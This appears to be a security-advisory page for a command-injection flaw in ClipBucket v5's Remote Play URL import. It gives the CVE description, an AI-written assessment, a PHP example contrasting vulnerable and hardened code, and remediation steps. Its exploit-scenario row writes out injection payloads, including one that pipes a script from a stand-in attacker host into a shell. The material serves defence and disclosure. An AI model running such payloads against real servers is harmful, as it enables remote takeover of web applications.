ClipBucket v5
CVE-2026-42846
Severity: CRITICAL
Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Note: the description states that 'any authenticated user' can exploit this, so the privilege metric should be PR:L rather than PR:N; a network-reachable web feature requiring no user interaction, with OS command execution as the outcome, yields full C/I/A impact.
Primary rating from Vendor (GitHub_M).
CVSS Vector (Vendor: GitHub_M)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description (CVE.org)
ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - #140, ClipBucket's Remote Play feature allows any authenticated user to add a video by importing an external URL as the source. Some shell commands are run with the URL as a parameter. The URL is concatenated directly into shell commands without escaping and then executed, so any shell metacharacter in the URL is interpreted by the shell. This results in arbitrary command execution. This issue has been patched in version 5.5.3 - #140.
Analysis (AI)
Remote command injection in ClipBucket v5 prior to version 5.5.3 - #140 allows authenticated users to execute arbitrary OS commands by submitting a crafted URL through the Remote Play video import feature. The URL is concatenated unescaped into shell commands, so any metacharacter is interpreted by the shell, yielding code execution as the web server user. …
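As an added illustration of the bug class described above (this is not ClipBucket's code; the function names, the download command and the sample URL are assumptions for this example), a remote-import handler in the vulnerable shape is shown beside a hardened form that validates the URL and hands it to the program without any shell interpretation:

```php
<?php
// Added, hypothetical illustration; not code from ClipBucket. Function names,
// the download command and the sample URL are assumptions for this example.

// VULNERABLE SHAPE: the user-supplied URL is concatenated into a shell command
// string, so the shell parses any metacharacters the URL contains.
function build_fetch_command_unsafe(string $url, string $dest): string
{
    return "wget -O " . $dest . " " . $url;
}

// Defence in depth, step 1: accept only absolute http(s) URLs. Rejecting bad
// input outright is safer than trying to strip metacharacters from it.
function is_allowed_remote_url(string $url): bool
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    return filter_var($url, FILTER_VALIDATE_URL) !== false;
}

// Step 2: never let a shell see the value. proc_open() accepts an argument
// array (PHP 7.4+) and executes the program directly, with no shell involved,
// so ';', '|', '$(' and similar characters reach wget as plain data.
function fetch_remote_video(string $url, string $dest): bool
{
    if (!is_allowed_remote_url($url)) {
        return false;
    }
    // '--' stops wget from treating a URL that starts with '-' as an option.
    $cmd  = ['wget', '-q', '-O', $dest, '--', $url];
    $proc = proc_open($cmd, [], $pipes);
    return is_resource($proc) && proc_close($proc) === 0;
}

// If a shell string is unavoidable, quote every argument individually;
// escapeshellarg() single-quotes the value and escapes embedded quotes.
function build_fetch_command_safe(string $url, string $dest): string
{
    return 'wget -O ' . escapeshellarg($dest) . ' -- ' . escapeshellarg($url);
}

// Constructed sample input carrying a shell metacharacter in the path.
$url  = 'http://videos.example.net/clip.mp4;echo injected';
$dest = '/var/tmp/import.mp4';
echo build_fetch_command_unsafe($url, $dest), "\n"; // ';' would end the wget command
echo build_fetch_command_safe($url, $dest), "\n";   // the whole URL is one quoted word
```

The two echo lines only print the command strings so the difference is visible; the hardened path a handler should actually take is `fetch_remote_video()`, which never builds a shell string at all.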
Vulnerability Assessment (AI)
| Aspect | Assessment |
|---|---|
| Exploitation | Exploitation requires a valid authenticated account on the ClipBucket v5 instance (any role that can access the Remote Play / external URL import feature; per the description, 'any authenticated user' suffices) and network reachability to the application's web interface. … |
| Risk Assessment | The CVSS 3.1 vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H scores 9.8, but the description explicitly states that 'any authenticated user' is required. This contradicts PR:N in the published vector; the realistic vector should carry PR:L. … |
| Exploit Scenario | An attacker registers (or uses an existing) low-privilege ClipBucket account, navigates to the Remote Play import form, and submits a URL such as `http://x/;id;#` or `$(curl attacker.tld/sh|sh)` as the video source. When the backend invokes the downloader/transcoder with the URL concatenated into the shell command, the injected payload is executed as the web server user, giving the attacker an interactive reverse shell and full read/write access to the application database and uploaded media. … |
| Remediation | Upgrade to ClipBucket v5 version 5.5.3 - #140 or later, which contains the vendor-released patch per GHSA-hvfx-hxmr-28c7 (https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-hvfx-hxmr-28c7). … |
Recommended Action (AI)
Within 24 hours: Inventory all ClipBucket deployments, disable the Remote Play feature if not actively used, and restrict network access to the application. …